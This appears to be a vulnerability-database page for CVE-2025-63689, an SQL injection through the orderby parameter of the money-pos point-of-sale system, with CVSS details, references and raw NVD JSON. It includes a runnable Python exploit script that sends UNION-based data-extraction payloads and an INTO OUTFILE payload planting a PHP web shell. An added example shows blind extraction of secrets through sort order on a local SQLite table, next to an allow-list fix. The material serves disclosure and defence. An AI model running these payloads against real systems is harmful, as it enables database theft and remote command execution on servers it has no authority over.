Security Vulnerability Report
CVE-2025-63689 CVSS 10.0 CRITICAL

CVE-2025-63689

Published: 2025-11-07 16:15:43
Last Modified: 2026-02-05 16:25:52

Description

Multiple SQL injection vulnerabilities (CWE-89) in the ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) allow a remote, unauthenticated attacker to inject SQL via the orderby parameter; the NVD description rates the outcome as arbitrary code execution.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Exploitability / Impact Subscores
3.9 / 6.0
Weakness
CWE-89 (SQL Injection)
Metric Source
Recorded in the NVD entry as a "Secondary" CVSS v3.1 metric (see Raw JSON Data below)

Configurations (Affected Products)

cpe:2.3:a:ycf1998:money-pos:*:*:*:*:*:*:*:* - VULNERABLE
ycf1998 money-pos < commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys
import requests

# CVE-2025-63689 SQL Injection PoC
# Target: ycf1998 money-pos system < commit 11f276bd20a41f089298d804e43cb1c39d041e59
# NOTE: '/api/endpoint' below is a placeholder; this page does not name the
# vulnerable route. Replace it with the listing endpoint that reads `orderby`.


def exploit(target_url, orderby_payload):
    """SQL injection via the orderby parameter: the payload is sent verbatim."""
    params = {'orderby': orderby_payload}
    try:
        response = requests.get(
            f'{target_url}/api/endpoint',
            params=params,
            timeout=10,
        )
        return response.text
    except requests.exceptions.RequestException as e:
        return f'Error: {e}'


# Example payloads, as published. Caveats: MySQL rejects UNION directly after
# ORDER BY, so the UNION payloads only work where the parameter lands in a
# position that permits it; INTO OUTFILE additionally needs the FILE privilege,
# a secure_file_priv setting that allows the path, and a web root writable by
# the database server.
payloads = [
    # Extract database version
    '1 UNION SELECT NULL,version(),NULL--',
    # Extract database name
    '1 UNION SELECT NULL,database(),NULL--',
    # Extract all table names
    '1 UNION SELECT NULL,group_concat(table_name),NULL '
    'FROM information_schema.tables WHERE table_schema=database()--',
    # File write for RCE (inner double quotes escaped so the Python literal parses)
    "1' INTO OUTFILE '/var/www/html/shell.php' "
    "LINES TERMINATED BY '<?php system($_GET[\"cmd\"]); ?>'--",
]

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-63689.py <target_url>')
        sys.exit(1)
    target = sys.argv[1]
    for payload in payloads:
        print(f'Testing payload: {payload}')
        result = exploit(target, payload)
        print(f'Result: {result}\n')
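The description places the injection in an orderby parameter, where the attacker controls a sort expression rather than a quoted value. The following is an added example, not code from this page or from the money-pos project: it runs against an in-memory SQLite table with constructed rows (the real backend, table and column names are not stated on the page and are assumptions here), shows a vulnerable handler that concatenates the sort key, extracts a secret through the resulting sort-order oracle one character per request, and puts the allow-listed handler that closes the hole beside it.

```python
import sqlite3

# Added example (not money-pos code). Constructed data: a stand-in table whose
# name and columns are assumptions, loaded into an in-memory SQLite database.
ROWS = [
    (1, "alice", "pw_hash_a1"),
    (2, "bob", "pw_hash_b2"),
    (3, "carol", "pw_hash_c3"),
]

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    conn.commit()
    return conn


def list_users_vulnerable(conn, orderby):
    """CWE-89 pattern: the request's sort key is pasted into the SQL text."""
    sql = f"SELECT id, name FROM users ORDER BY {orderby}"
    return [row[1] for row in conn.execute(sql)]


# Hardened variant: the request value selects an entry from a fixed allow-list,
# and the query text is built only from allow-list entries, never from input.
ALLOWED_COLUMNS = {"id", "name"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def list_users_hardened(conn, orderby):
    parts = orderby.strip().split()
    if len(parts) not in (1, 2):
        raise ValueError("unsupported orderby")
    column = parts[0].lower()
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("unsupported orderby")
    sql = f"SELECT id, name FROM users ORDER BY {column} {direction}"
    return [row[1] for row in conn.execute(sql)]


def hardened_rejects(conn, orderby):
    """True if the hardened handler refuses the value instead of running it."""
    try:
        list_users_hardened(conn, orderby)
    except ValueError:
        return True
    return False


def oracle_payload(target_id, position, char):
    """ORDER BY takes an expression, so a CASE on a secret steers the sort:
    ascending ids when the guessed character is right, descending otherwise."""
    return (
        f"(CASE WHEN substr((SELECT secret FROM users WHERE id={target_id}),"
        f"{position},1)='{char}' THEN id ELSE -id END)"
    )


def leak_secret(conn, target_id, max_len=32, alphabet=ALPHABET):
    """Boolean-style extraction through the sort order, one character per hit."""
    ascending = [row[1] for row in conn.execute("SELECT id, name FROM users ORDER BY id")]
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            if list_users_vulnerable(conn, oracle_payload(target_id, pos, ch)) == ascending:
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the secret, or a char outside ALPHABET
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable handler:", leak_secret(db, 1))
    print("hardened handler rejects payload:",
          hardened_rejects(db, oracle_payload(1, 1, "p")))
```

Quoting or escaping does not help here because the sort key was never a string literal; the only robust fix is the one list_users_hardened applies, mapping the request value onto a fixed set of column names and directions and building the statement from those. The same oracle works against MySQL with IF() or CASE in place of the SQLite-specific details, which is why a UNION-free ORDER BY injection is still a full data-exfiltration primitive.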

References

https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46 (Exploit, Third Party Advisory)
https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59 (Patch)
https://github.com/ycf1998/money-pos/issues/3 (Exploit, Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63689", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:42.503", "lastModified": "2026-02-05T16:25:52.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple SQL injection vulnerabilitites in ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) allows a remote attacker to execute arbitrary code via the orderby parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ycf1998:money-pos:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-09-14", "matchCriteriaId": "B76175F0-5B2C-4FA8-A57E-88FBE99BDC79"}]}]}], "references": [{"url": "https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ycf1998/money-pos/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}